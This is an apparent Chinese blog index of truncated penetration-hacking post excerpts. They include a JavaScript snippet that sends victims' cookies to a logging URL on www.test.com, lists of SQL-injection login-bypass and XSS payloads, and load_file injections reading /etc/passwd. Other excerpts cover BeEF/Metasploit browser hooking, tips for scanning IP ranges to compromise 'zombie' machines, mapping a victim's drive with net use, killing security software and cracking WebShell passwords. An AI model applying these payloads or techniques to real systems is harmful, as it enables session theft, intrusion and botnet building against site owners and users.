随笔分类 - 网络渗透
网络渗透的各种知识、技巧、经验等等。
摘要:有些时候我们在渗透测试的时候需要提交一些假的http头信息或者一些post参数,这时候我们可以用nc来提交,命令是nc -v www.test.com<abc.txt其中www.test.com就是目标网站,abc.txt中就是需要提交的数据,比如我想往一个网页提交一个post参数的值。页面代码是:<?php$auth='0';extract($_POST);if($auth == 1){echo "private!";}else{echo "public";}?>这段代码是我用来测试extract函数的变量覆盖漏洞的,
阅读全文
摘要:转自:http://hi.baidu.com/unixshell/item/2b57af1112ec9df9746a8430配置beef和metasploit(包含安装Beef过程)系统环境:BackTrack5R1软件版本:Beef0.4.3.6-alphametasploitv4.4.0-devsvnr15552一、前言之前对于BeEF毫无了解,好奇心驱使下便按部就班研究一下,虽然中途问题多多,但是最后还算成功,收获不少二、安装BeEF按照文章上所指,先删除BT5上面自带的版本稍旧的BeEFrm-rf/pentest/web/beef-ng然后通过Gitclone最新的BeEF代码gitc
阅读全文
摘要:转自:http://hi.baidu.com/unixshell/item/396c3e9968dbf4cfb625310cBeEF是目前欧美最流行的web框架攻击平台,它的全称 是theBrowserexploitationframeworkproject.最近两年国外各种黑客的会议都有它的介绍,很多 pentester对这个工具都有很高的赞美。通过XSS这个简单的漏洞,BeEF可以通过一段编制好的javascript控制目标主机的浏览器,通过 浏览器拿到各种信息并且扫描内网信息,同时能够配合metasploit进一步渗透主机,强大的有些吓人。如何配置beef和metasploitwindo
阅读全文
摘要:转自:http://www.2cto.com/Article/201207/140515.html作者 Joe Lynch[Dis9]1、引言Beef 一个很强大的xss 攻击框架新版的beef 还不是很熟悉2、测试开始msf > beef_connect http://192.168.2.106:3000 beef beef[*] Connected to http://192.168.2.106:3000msf > beef_onlineCurrently hooked browsers within BeEFId IP OS-- -- --0 1.1.1.2 Microsof
阅读全文
摘要:在evil.js文件中写如下代码,存储在www.test.com根目录下var img=document.createElement("img");img.src="http://www.test.com/log?"+escape(document.cookie);document.body.appendChild(img);然后在测试页,想办法让别人运行这段代码<script src="http://www.test.com/evil.js"></script>然后在web日志中可查看窃取的cookie信息如
阅读全文
摘要:首先给个链接给你:http://www.google.com/webhp?hl=xx-hacker你会看到google的页面居然全部是乱码????n0rM4Ls34rChIm46356r00pZd1r3c70rY4DV4NC3D534RC|-|PR3F3R3N(3Z£4|\|6µ463700|54||480u7Google-Google.cominEnglishM4k3GoogleY0ur|-|0m3p463!你一定看不懂!但是Monyer和我的黑客兄弟们却是各个都懂的,因为这个就是传说中的黑客语言!让Monyer先给你翻译一遍!normalsearchimagesgrou
阅读全文
摘要:很多新手抓鸡的时候,为了IP段很头疼。有一种方法大家可以试试,我试验过还是可以的。首先选择一个你要扫的城市,比如:浙江打开百度,在里面输入浙江,然后出现一个某某网站,你把网站的地址复制一下然后用啊D或则别的工具转换一下,网站地址转换IP然后出现64.128.78.52(我随便写的)我们扫肉鸡可以选择61.128+15.78.52或则61.128-15.255.255其实意思就是第2个IP地址加上15或则减去15就是这个地址旁边所有的IP地址。
阅读全文
摘要:而且在一般情况下,一些功能对管理员来说也是没有必要的。如果你不需要MS SQL Server 的xp_cmdshell(use sp_dropextendedproc "xp_cmdshell"这项功能就不要把xp_cmdshell extended stored proc(扩展存储过程)命令功能留着。 我们只需要在isql窗口中输入:use mastersp_dropextendedproc 'xp_cmdshell'net use 映射盘符: \\肉鸡IP\肉鸡盘符譬如:net use z: \\1.1.1.1\c (把对方的c盘映射成你的z盘),察看一
阅读全文
摘要:在开了3389终端之后但是连接不上的可能情况:(1).目标服务器是内网 终端端口是你开的话 99%需要端口转发 有时候如果服务器开了终端的话很有可能映射了也不就需要转发(2). 目标是外网 开了3389 但连接不上终端以下是各种情况可能原因及突破办法1. 突破安全狗限制连接终端:突破安全狗限制连接服务器终端:执行杀安全狗的exe2. 突破SecureRDP限制连接终端科普:SecureRDP是一款国外的软件,可以用该软件限制远程桌面登录的计算机名、MAC、IP,指定的才能登陆服务器的远程桌面,否则一律拒绝,支持Windows2003服务器操作系统,以下是这款限制软件的突破方法:执行目录echo
阅读全文
摘要:在前面已经为大家演示了如何利用工具进行cookie欺骗,然后进入后台。现在我们从程序的角度上来学习如何挖掘代码中存在的cookie欺骗漏洞。还是以第二章中的那个心情网络投票系统来举例。我们先来看看在心情网络投票系统中系统是如何得到cookie的,它的程序其实就上上一节中采用cookie验证的那个例子,代码这里不在列举出来了,可以参考上面的。在上面的代码中,有样的两行代码:response.cookies("admin")=rs("admin")response.cookies("pass")=rs("pass")当
阅读全文
摘要:1:"or "a"="a2:'.).or.('.a.'='.a3:or 1=1--4:'or 1=1--5:a'or' 1=1--6:"or 1=1--7:'or.'a.'='a8:"or"="a'='a9:'or''='10:'or'='or'
阅读全文
摘要:经典'or'='or'漏洞也叫身份验证登陆漏洞,这是一个比较老的漏洞,不过目前很多系统还是存在这样的漏洞。前面我们已经知道了利用'or'='or'这个漏洞我们就可以顺利的登陆网站后台,那么为什么输入这样的代码就可以进入后台呢?在讲这个漏洞之前我们先来回顾一点点数学知识。就是AND和OR运算符的运算规则,在第5章也讲了,不过为了给大家加深印象,这里还把他们的运算规则列出来。如果在一个关系式里,同时了AND和OR运算符,就会有一个优先级的问题,如果是相同的逻辑符,则按照从左到右的运算顺序。逻辑运算符AND和OR的运算优先次序是:先运算
阅读全文
摘要:一、load_file()函数的应用1.获得字段数order by nand 1=2 union select 1,22.load_file()获取敏感信息读取c:\boot.ini信息,要用十六进制的形式and 1=2 union select 1,load_file(0x633A5C626F6F742E696E69)其他敏感信息load_file(char(47)) 列出freebsd目录/etc/passwd读取httpd.conf/etc/init.d/apache/etc/init.d/apache2/etc/httpd/httpd.conf/etc/apache/apache.co
阅读全文
摘要:<html><head><title>mysql注入漏洞测试</title></head><body><?php$mysql_server_name='localhost';$mysql_username='root';$mysql_password='shanmao';$conn=mysql_connect($mysql_server_name,$mysql_username,$mysql_password)or die('Could not connect:
阅读全文
摘要:1.标准的xss漏洞测试代码<script>alert('xss')</script>2.img图片标记属性跨站攻击代码<img src="javascript:alert(/xss/)"></img><img dynsrc="javascript:alert('xss')">3.无需"<>",利用html标记事件属性跨站(1)利用已知事件<img src="" onerror=alert("xs
阅读全文
摘要:<% //这是ASP的标记str=trim(request("a")) //request对象作用是获取客户端表单中输入的数据response.write str //response也是ASP的一个对象,write是它的一个方法,其作用是往页面中输出//数据,在这里就是在页面中输出strresponse.write "<br>"response.write "<img src="&str&"></img>"%><form action=xss.
阅读全文
摘要:上篇博客讲到了通过BurpSuit实现NC上传,今天将演示用BurpSuit破解WebShell的验证密码。其实,就破解而言,BurpSuit的基本原理和溯雪是一样的,但是在某些功能上要比前者完善一些。OK,Let'sGo!!!首先,在WebShell密码框处输入一个任意密码,以便抓取密码验证请求包。至于怎么抓取,这里就不多费口舌了,可以参考我的上一篇博客。分析数据包后,发现该请求包有两个重要参数(Pass和Cookie,红色字体部分),我们要测试的只有Pass参数。在History标签中找到我们要修改的请求包,右击→选择sendtointruder,接着就来到了Intruder模块。
阅读全文
摘要:文章来源莲山课件www.5YKJ.Com1Fckeditor漏洞利用总结查看编辑器版本FCKeditor/_whatsnew.html—————————————————————————————————————————————————————————————2.Version2.2版本Apache+linux环境下在上传文件后面加个.突破!测试通过。—————————————————————————————————————————————————————————————3.Version<=2.4.2Forphp在处理PHP上传的地方并未对Media类型进行上传文件类型的控制,导致用户上传
阅读全文
摘要:作者:月无痕&&花非花来源:红狼安全小组(www.wolfexp.net,www.crst.com.cn)注:本文以发表于黑客手册,转载请加上出处一.接触起因这几天事情较多,一直都没去老大的论坛转!今天好友joli突然Q我说论坛上有人发了个脚本的问题,叫我也一起看一下,于是我就跑过去看了下(你家离论坛很近?竟然可以跑着过去!),也就有了下面这篇文章(测试版本为讯时新闻发布系统v2.70版 )。二.漏洞初探打算先看有没有经典的OR漏洞,虽然已经出来很久的漏洞了,但是很多程序仍然会存在这样的漏洞,admin_login.asp存在如下代码:if request("user
阅读全文